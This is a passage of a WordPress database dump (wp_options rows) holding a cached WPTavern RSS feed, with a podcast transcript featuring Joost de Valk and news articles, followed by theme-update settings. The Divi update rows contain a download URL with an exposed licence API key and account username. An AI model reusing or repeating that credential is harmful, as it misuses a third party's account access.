needed stuff that simply wasn&#8217;t there. And then at some point you have to admit like, okay, I&#8217;m wrong. This is not going to happen and we need to build our own. It was sort of like a bittersweet decision. And I&#8217;m happy to add that people are responding well to the library that we built and that, that we open sourced.</p>\n\n\n\n<p>Because I want to spare others to work. Because it&#8217;s stupid. It&#8217;s stupid that as a plugin developer, I have to spend time thinking about what do my buttons look like? What do my toggles look like? They should just be the same for everyone.</p>\n\n\n\n<p>[00:29:03] Nathan Wrigley: I can completely sympathize with that, in the sense that you&#8217;ve spent years basically saying, no, to your design team. We&#8217;re just going to stick with this. But eventually, I guess there&#8217;s too much water has gone under that bridge that really you&#8217;re stifling your own company&#8217;s enterprise.</p>\n\n\n\n<p>[00:29:20] Joost de Valk: Literally, I mean, people moved to others plugins because they thought it looked better. Which I think is a stupid reason to switch SEO plugins. But who am I? But it was literally happening, and I, at some point you go like, okay, I really need to do better at this. And to be fair, the new settings you are that we ended up building, I think our UX team did an amazing job on, and makes the plugin a lot easier to use.</p>\n\n\n\n<p>[00:29:49] Nathan Wrigley: I will link to the design library, which has been open sourced again in the show notes, but it&#8217;s a really amazing endeavor. If you are a plugin developer or, you know, you have aspirations to be, it&#8217;s definitely well worth checking out because looks like Yoast have really gone to town. It&#8217;s soup to nuts. Almost every component or element that you could possibly imagine putting inside of a WordPress UI, is there, you know. Progress bars, radio buttons. Every single thing is there with loads of instructions on how to implement it.</p>\n\n\n\n<p>I guess if the endeavor was to begin that conversation, then already, I think it&#8217;s been a success. If the endeavor of this blog post and the, the new UI that you&#8217;ve bring into existence. If the endeavor there was to start a conversation about this, then yeah, I think you&#8217;ve done that.</p>\n\n\n\n<p>[00:30:39] Joost de Valk: At this point we&#8217;ve invested so much time that I don&#8217;t see us switching to something else anytime soon. But that also sort of saddens. That&#8217;s why I wrote the post on my personal blog. I&#8217;m like, this is not necessarily the decision I would&#8217;ve wanted to make. But yeah, you are sort of forced into it. At that point it&#8217;s better if we build something and we open source it, and then maybe a lot of others can use it as well. And maybe we can actually get to an interface where we all sort of look alike.</p>\n\n\n\n<p>[00:31:08] Nathan Wrigley: Have you been in the role at Newfold long enough to have interfaced with customers to know that this is a, a thing which is stifling WordPress growth. The fact that it does look out of date. The fact that it&#8217;s a jumble of different colors and patterns and design libraries being in used in different plugins. Does this turn people off in the real world?</p>\n\n\n\n<p>[00:31:28] Joost de Valk: I&#8217;m a hundred percent sure. You test with these things, of course, and you see the data on how many people start. Register with a host. They get a hosting package. They get a WordPress site, and how many then get to a published site? Not everyone gets to a published site, and that I think will never happen, but well the more that do, the more that will basically remain customers. So for a host, that&#8217;s an important metric.</p>\n\n\n\n<p>And people just get stuck. And then when you look at where they get stuck, they get stuck at picking a theme. And then when they have a theme, they get stuck at making it look good, especially making it look like the demo.</p>\n\n\n\n<p>And then they get stuck at building pages. They get stuck at several phases. And there&#8217;s quite a few of those phases that you have to get through before you get to a website that you&#8217;re happy with. So we&#8217;re trying to make that simpler, and I think we&#8217;re actually doing very cool work on that at Bluehost and Newfold in general. But some of that should also happen in Core.</p>\n\n\n\n<p>[00:32:29] Nathan Wrigley: Yeah, it&#8217;s interesting. If you are Squarespace or Wix or whoever it may be, I guess the person who&#8217;s in charge of the way that the platform looks, just makes the decision and it&#8217;s done and everybody then toes the line and does that thing. Okay, we&#8217;re going to make it look different. We&#8217;re going to modify it. 2023, we&#8217;re going to give our entire enterprise a new look and feel. Let&#8217;s get on with it.</p>\n\n\n\n<p>Of course, in WordPress, given the nature of the way that the software is developed, that&#8217;s really hard. And getting people to have a consensus on this, like you said, you&#8217;d had several chats with a few people who may be able to push the needle a little bit there, and there&#8217;s not always complete agreement.</p>\n\n\n\n<p>It will be difficult, but my personal feeling is that it needs to be quite high on the list of things happening. But given that Gutenberg, we&#8217;re about to enter phase three of Gutenberg. Given that Gutenberg is consuming so much time and resources of developers, I do wonder whether this interface will get much of a makeover in the next, I don&#8217;t know, next year or so.</p>\n\n\n\n<p>[00:33:32] Joost de Valk: I wondered that too. I don&#8217;t have an answer because I don&#8217;t know, but it is a conversation that I&#8217;m going to have, be having with people. And I do actually think that it might, it might field counterintuitive, but I actually think that building that design system first might actually speed up the other work.</p>\n\n\n\n<p>[00:33:51] Nathan Wrigley: Yeah, well it certainly gives you a benchmark of what can be achieved. Yeah, it&#8217;d be interesting in your new role, whether or not you can corral some people into pushing that forward.</p>\n\n\n\n<p>Yoast, we&#8217;re reaching the 40 minute mark. I think that&#8217;s about where I wanted to get to. If there&#8217;s anything that you think I missed, please let me know.</p>\n\n\n\n<p>[00:34:10] Joost de Valk: No, there&#8217;s always more to talk about, it&#8217;s WordPress.</p>\n\n\n\n<p>[00:34:13] Nathan Wrigley: If that&#8217;s the case and we&#8217;ve covered everything, I&#8217;ll just ask you to let us know where people can find you, given that you&#8217;re in a transitionary period. Where&#8217;s the best place for people to discover you from now on?</p>\n\n\n\n<p>[00:34:25] Joost de Valk: That&#8217;s joost.blog, j o o s t.blog. So my first name, not the company name. And Twitter, j d e v a l k, J de Volk is probably the best place. And if people have questions or want to just chat, I&#8217;m on the WordPress Slack as well. So feel free to DM me there.</p>\n\n\n\n<p>[00:34:44] Nathan Wrigley: Thank you very much, Joost for chatting to us on the podcast today. I really appreciate it.</p>\n\n\n\n<p>[00:34:48] Joost de Valk: Again, thank you for having me, it was a pleasure.</p>\n</div>\n\n\n\n<p>On the podcast today we have <a href=\"https://profiles.wordpress.org/joostdevalk/\">Joost De Valk</a>.</p>\n\n\n\n<p>If you’ve been in the WordPress space for any length of time, it’s likely that you’ve come across the <a href=\"https://wordpress.org/plugins/wordpress-seo/\">Yoast SEO plugin</a>. This was the brainchild of the guest today, Joost, same pronunciation, different spelling.</p>\n\n\n\n<p>We talk about how Joost found WordPress and quickly started working on his SEO plugin. How it rapidly grew and became his career.</p>\n\n\n\n<p>We discuss the WordPress landscape during this time and whether it’s more difficult now to have the type of success that his plugin received, given that there are more players vying for our attention.</p>\n\n\n\n<p>The conversation then moves into why the plugin was recently sold to Newfold Digital. What were the guardrails that were put in place to ensure that the plugin continued and the employees felt safe?</p>\n\n\n\n<p>We then get into a conversation about Joost’s new role. He’s been tasked with reaching out to WordPress community members in order to see what projects or initiatives need more thought and support.</p>\n\n\n\n<p>This leads us into the topic of the current WordPress UI, and how Joost is hoping for a refresh at some point soon. For years his plugin team wanted to create their own UI to take advantage of new technologies, but Joost always pushed back, preferring instead to adopt the style of the WordPress UI. Now that’s changed, and the open sourcing of the UI kit they’ve made is intended as a starting point for a discussion about the need for a more consistent admin experience for all WordPress users.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Useful links.</h2>\n\n\n\n<p><a href=\"https://yoast.com/wordpress/plugins/seo/\">Yoast SEO plugin</a></p>\n\n\n\n<p><a href=\"https://elementor.com/\">Elementor</a></p>\n\n\n\n<p><a href=\"https://newfold.com/\">Newfold Digital</a></p>\n\n\n\n<p><a href=\"https://www.bluehost.com/\">Bluehost</a></p>\n\n\n\n<p><a href=\"https://www.hostgator.com/\">HostGator</a></p>\n\n\n\n<p><a href=\"https://www.domain.com/\">domain.com</a></p>\n\n\n\n<p><a href=\"https://yithemes.com/\">Yith</a></p>\n\n\n\n<p><a href=\"https://tailwindcss.com/\">Tailwind CSS</a></p>\n\n\n\n<p><a href=\"https://joost.blog/wordpress-admin-ui-needs-to-be-better/\">Joost&#8217;s post about the WordPress Admin UI</a></p>\n\n\n\n<p><a href=\"https://twitter.com/jdevalk\">Joost&#8217;s Twitter</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Mar 2023 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WPTavern: Pattern Manager Plugin Now Available on WordPress.org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143093\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wptavern.com/pattern-manager-plugin-now-available-on-wordpress-org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2563:\"<p>WP Engine&#8217;s <a href=\"https://wordpress.org/plugins/pattern-manager/\">Pattern Manager</a> is now available in the WordPress Plugins Directory. The plugin gives WordPress professionals a dedicated interface for browsing, designing, and organizing patterns with categories, keywords, descriptions, and more. It is still in beta and not recommended for use in production. Although it can be used on a lived website, the plugin&#8217;s intended use is for managing patterns on a locally hosted development site.</p>\n\n\n\n<img />\n\n\n\n<p>The Pattern Manager makes it possible to use core features for which there isn&#8217;t yet an interface:</p>\n\n\n\n<ul>\n<li>When a user makes a new page or post, auto-show a modal with your patterns, available to be used.</li>\n\n\n\n<li>Make your pattern available in the block inserter, or choose to hide it from the inserter.</li>\n\n\n\n<li>Allow users to transform any block into your pattern.</li>\n</ul>\n\n\n\n<p>WP Engine made several improvements to the plugin based on beta feedback since the time we <a href=\"https://wptavern.com/wp-engine-pattern-manager-plugin-now-in-beta\">reviewed the plugin</a> earlier this month. The matter of where the patterns are stored was one issue the testers were concerned about. Pattern Manager pushes the patterns to PHP files every time the user saves them, which also makes them available for collaboration via git.</p>\n\n\n\n<p>&#8220;One of the most requested features was child theme support, so we added that,&#8221; WP Engine Principal Engineer Mike McAlister said. &#8220;Now, if you have a child theme active, Pattern Manager will save your new patterns to the child theme, while all of the patterns in your parent theme are still available.&#8221;</p>\n\n\n\n<p>Another common request McAlister&#8217;s team received was the ability to register custom pattern categories. This feature is currently in development and will be available in the plugin in the near future.</p>\n\n\n\n<p>&#8220;Other than that, we made a lot of nice little improvements like adding a setting for defining the pattern preview width, deprioritizing the Pattern Manager admin menu item (which was previously at the top of the admin menu), and some light UI touch-ups,&#8221; McAlister said. </p>\n\n\n\n<p>&#8220;We had over 300 people in the beta and the feedback was highly positive, which is surprising for a niche developer tool like this. To me, it speaks to the interest in all of this new WordPress technology and how developers are looking for tools like Pattern Manager to help them start working with it.&#8221;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Mar 2023 19:52:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: WordPress 6.2 Delayed to March 29 Due to Bug With Date Formats\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143080\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wptavern.com/wordpress-6-2-delayed-to-march-29-due-to-bug-with-date-formats\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2304:\"<p>WordPress 6.2 was scheduled for release today, but contributors discovered <a href=\"https://core.trac.wordpress.org/ticket/57998\">a bug with date formats</a> during the 24-hour freeze that they believe could have <a href=\"https://core.trac.wordpress.org/ticket/57998#comment:15\">a significant impact</a> on functionality like bookings, date permalinks, and e-commerce stores.</p>\n\n\n\n<p>The decision was made this morning to delay with a consensus to apply a revert and release a silent 6.2 RC5 with the fix. WordPress 6.2 Core Tech Co-Lead Tonya Mork <a href=\"https://wordpress.slack.com/archives/C02RQBWTW/p1680004419127649\">proposed reverting</a> as the impact seemed too widespread to risk releasing today with a fix delayed to a minor release. </p>\n\n\n\n<p>&#8220;I don&#8217;t think this can wait until 6.2.1 given that this isn&#8217;t just some text that won&#8217;t bold, but something that will have quite a big impact (including stress/financial) on site owners and staff managing bookings and such,&#8221; 6.2 Core Triage Lead Colin Stewart said.</p>\n\n\n\n<p>WordPress Core Committer Jonathan Desrosiers also weighed in on the issue in favor of a revert and silent RC5.</p>\n\n\n\n<p>&#8220;I also think that [it&#8217;s] impossible to anticipate the full impact of this change,&#8221; Desrosiers said. &#8220;This definitely illustrates the importance of accompanying even the smallest changes with appropriate tests. We owe this due diligence to our users.</p>\n\n\n\n<p>&#8220;If we release the issue with 6.2 we could have a much greater problem on our hands. It’s not something that would not be easy to recognize or understand for the large majority of users, and it’s nearly impossible for Core to &#8216;auto-fix&#8217; any occurrences of the bug  in a future minor release. We also should really avoid having to include fixes like that anyway as they’re just a huge maintenance burden/technical debt.&#8221;</p>\n\n\n\n<p>Contributors in the discussion this morning agreed that knowingly shipping broken code just to keep the schedule would be a wrong move and that shipping a fix today could introduce additional problems. An announcement will be posted to the Make/Core, followed by the 6.2 RC5 release, which will restart the 24-hour clock ahead of the official 6.2 release tomorrow.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Mar 2023 14:26:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"Do The Woo Community: Insights, Tips and Legalities on Accessibility with Bet Hannon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74647\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://dothewoo.io/insights-tips-and-legalities-on-accessibility/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:429:\"<p>Bet Hannon, from AccessiCart joins us for a conversation around web design, WooCommerce and the legalities of accessibility.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/insights-tips-and-legalities-on-accessibility/\">Insights, Tips and Legalities on Accessibility with Bet Hannon</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Mar 2023 10:06:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"WPTavern: Real-Time Collaboration Is Coming to WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143050\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wptavern.com/real-time-collaboration-is-coming-to-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6910:\"<p>Gutenberg Phase 3 is officially in the planning stage, as the Site Editor is set to exit the beta in 6.2 and the major tasks of Phase 2 are nearing completion.</p>\n\n\n\n<p>Gutenberg lead architect Matias Ventura <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">published</a> a preliminary outline of what is planned to be included in the next &#8220;Collaboration&#8221; phase of the project. Real-time collaboration is at the top of the list, the likes of which users have previously experienced in apps like Google Docs.</p>\n\n\n\n<p>&#8220;Imagine being able to work together in real-time across all block editors, crafting content and designs seamlessly without being locked out of editing,&#8221; Ventura said. &#8220;The goal is to provide all the necessary infrastructure and UI to handle multiple users working together on the same content simultaneously, making it easier to create, edit, and customize web pages and posts as a team.&#8221;</p>\n\n\n\n<p>In a recent episode of the <a href=\"https://wordpress.org/news/2023/03/episode-52-phase-three-with-hector-prieto/\">WP Briefing podcast</a>, WordPress core contributor Héctor Prieto said he predicts this feature will take the most work.</p>\n\n\n\n<p>&#8220;I would say, in general, the real-time collaboration sounds the most technically challenging because of what it represents and all the changes needed to how we interact with WordPress from async to sync, basically,&#8221; Prieto said. &#8220;That would be the hardest part. I think there are also already a few prototypes working, but we need to see how that scales, for example.&#8221;</p>\n\n\n\n<p>Prieto was referencing Gutenberg engineer Riad Benguella&#8217;s <a href=\"https://wptavern.com/asblocks-project-uses-gutenberg-to-create-a-collaborative-writing-environment\">AsBlocks project</a>, which he <a href=\"https://riad.blog/2020/06/11/write-as-blocks-in-an-encrypted-collaborative-environment/\">introduced</a> on his blog in 2020 and is <a href=\"https://github.com/youknowriad/asblocks\">available on GitHub</a>. Another prototype, &#8220;Block Collab: New package, a framework for collaborative editing,&#8221; currently exists as <a href=\"https://github.com/WordPress/gutenberg/pull/23129/commits\">a draft PR</a> created by Gutenberg contributor Enrique Piqueras.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>AsBlocks demo video\n\n\n\n<p>Asynchronous collaboration will also get some attention in this phase, which includes features like sharing drafts for content and design changes, inline block commenting, assignment review, improved version control, and task management. These are features that are currently available to WordPress users through a variety of different plugins.</p>\n\n\n\n<p>&#8220;The goal is to enable users and larger teams to collaborate on projects and its different parts at their own pace and based on their workflows,&#8221; Ventura said.</p>\n\n\n\n<p>Ventura also identified Publishing Flows and improvements to the Post Revisions interface as parts of the Collaboration phase. This would include features like an interface for editorial requirements, customized goals, and task completion prerequisites before publishing. Post Revisions would become more visual, inclusive of individual blocks, and may even be updated to to support more complex scheduling requirements across multiple parts of the site.</p>\n\n\n\n<p>Collaboration may less critical to WordPress&#8217; success than world-class publishing capabilities but it will be refreshing to look past the editors to begin improving the admin experience. There are a few pieces of the puzzle that will will require contributors to jump in on getting WordPress&#8217; admin to the place where it can handle more modern collaboration workflows. Ventura said part of this project is to begin the process for an <a href=\"https://make.wordpress.org/design/2022/06/13/thinking-through-the-wordpress-admin-experience/\">admin design update and navigation work</a>, improving admin notices and the UI library of design components, as well as the ancient admin list views. </p>\n\n\n\n<p>Ventura also loosely outlined a Library focus area that would introduce a place for managing blocks, patterns, styles, and fonts. </p>\n\n\n\n<p>&#8220;As part of this work, also look at what improvements can be done to enhance the media library design, interactions, and extensibility,&#8221; Ventura said. He confirmed to commenters that this part of the project was left &#8220;intentionally vague as it needs a bit more thinking.&#8221;</p>\n\n\n\n<p>The last item in the Collaboration outline is a global search and command component that would be extensible and allow admins to navigate directly to content or different admin areas as well as run comments like &#8220;create new post&#8221; or &#8220;toggle top toolbar.&#8221; </p>\n\n\n\n<p>&#8220;As AI tools are taking the world by storm, this could also play an important role in letting plugin authors integrate novel solutions that are prompt based in nature,&#8221; Ventura said.</p>\n\n\n\n<p>Although Ventura assured readers that projects related to prior phases will continue, such as more blocks, improved tables, grid layout system, and the block API roadmap, there are those who would like to see more time spent on editing and customization before moving on.</p>\n\n\n\n<p>&#8220;I love the initiative, but I wish they’d slow down and focus on the overall WordPress experience and mobile design tools, which affect virtually every user,&#8221; WP Engine developer Mike McAlister <a href=\"https://twitter.com/mikemcalister/status/1583290176880922624\">said</a> in October 2022. &#8220;Collaboration tools won’t make or break WordPress, but the user experience will.&#8221;</p>\n\n\n\n<p>In March, McAlister commented again on the pace of the Gutenberg project&#8217;s phases. &#8220;I would add a new phase of User Experience between 2 and 3,&#8221; he <a href=\"https://twitter.com/mikemcalister/status/1631023076212191233\">said</a>. &#8220;We need a whole phase dedicated to refining the experience of all these great new tools.</p>\n\n\n\n<p>&#8220;I am very optimistic about all of the features, but even as a veteran WordPress builder, the experience is still quite maddening at times. I don’t know if we’re spending enough time understanding the problems before implementing solutions and moving on to the next thing.&#8221;</p>\n\n\n\n<p>Ventura said the timing for breaking ground on the Collaboration phase would not be the 6.3 release coming in August 2023. Contributors are still working towards refining the customization experience as WordPress prepares to bring the Site Editor out of beta in the 6.2 release. He encouraged people to share feedback in the comments on the <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">post</a> if there are any items they were hoping to see as part of the Collaboration phase.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Mar 2023 01:21:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:48:\"WpOrg\\Requests\\Utility\\CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 19 Apr 2023 15:45:28 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:13:\"last-modified\";s:29:\"Wed, 19 Apr 2023 15:30:30 GMT\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:16:\"content-encoding\";s:2:\"br\";s:4:\"x-nc\";s:9:\"HIT ord 2\";}}s:5:\"build\";s:14:\"20211221090300\";}','no'),(17167,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1681902659;s:7:\"checked\";a:4:{s:4:\"Divi\";s:6:\"4.20.4\";s:15:\"twentytwentyone\";s:3:\"1.8\";s:17:\"twentytwentythree\";s:3:\"1.1\";s:15:\"twentytwentytwo\";s:3:\"1.4\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:4:{s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"1.8\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.8.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.1\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.1.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.4.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}s:4:\"Divi\";a:6:{s:5:\"theme\";s:4:\"Divi\";s:11:\"new_version\";s:6:\"4.20.4\";s:3:\"url\";s:52:\"https://www.elegantthemes.com/api/changelog/divi.txt\";s:7:\"package\";s:147:\"https://www.elegantthemes.com/api/api_downloads.php?api_update=1&theme=Divi&api_key=f619d3dc3566fdf135533e40a5145de8b6e0e977&username=CorridorMedia\";s:8:\"requires\";s:0:\"\";s:12:\"requires_php\";s:0:\"\";}}s:12:\"translations\";a:0:{}}','no'),(17168,'_site_transient_et_update_themes','O:8:\"stdClass\":4:{s:7:\"checked\";a:4:{s:4:\"Divi\";s:6:\"4.20.4\";s:15:\"twentytwentyone\";s:3:\"1.8\";s:17:\"twentytwentythree\";s:3:\"1.1\";s:15:\"twentytwentytwo\";s:3:\"1.4\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:1:{s:4:\"Divi\";a:6:{s:5:\"theme\";s:4:\"Divi\";s:11:\"new_version\";s:6:\"4.20.4\";s:3:\"url\";s:52:\"https://www.elegantthemes.com/api/changelog/divi.txt\";s:7:\"package\";s:147:\"https://www.elegantthemes.com/api/api_downloads.php?api_update=1&theme=Divi&api_key=f619d3dc3566fdf135533e40a5145de8b6e0e977&username=CorridorMedia\";s:8:\"requires\";s:0:\"\";s:12:\"requires_php\";s:0:\"\";}}s:12:\"last_checked\";i:1681902659;}','no'),(19058,'_transient_timeout_et_core_path','1681990519','no'),(19059,'_transient_et_core_path','/home/corrid11/cmdev-site1.com/wp-content/themes/Divi/core','no'),(18032,'_transient_timeout_et_core_version','1681990519','no'),(18033,'_transient_et_core_version','4.20.4','no'),(1403,'wp_calendar_block_has_published_posts','1','yes'),(3518,'widget_nexforms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3519,'external_updates-main','O:8:\"stdClass\":5:{s:9:\"lastCheck\";i:1677860072;s:14:\"checkedVersion\";s:3:\"8.3\";s:6:\"update\";O:8:\"stdClass\":10:{s:4:\"slug\";s:4:\"main\";s:7:\"version\";s:5:\"7.8.1\";s:12:\"download_url\";s:55:\"http://basixon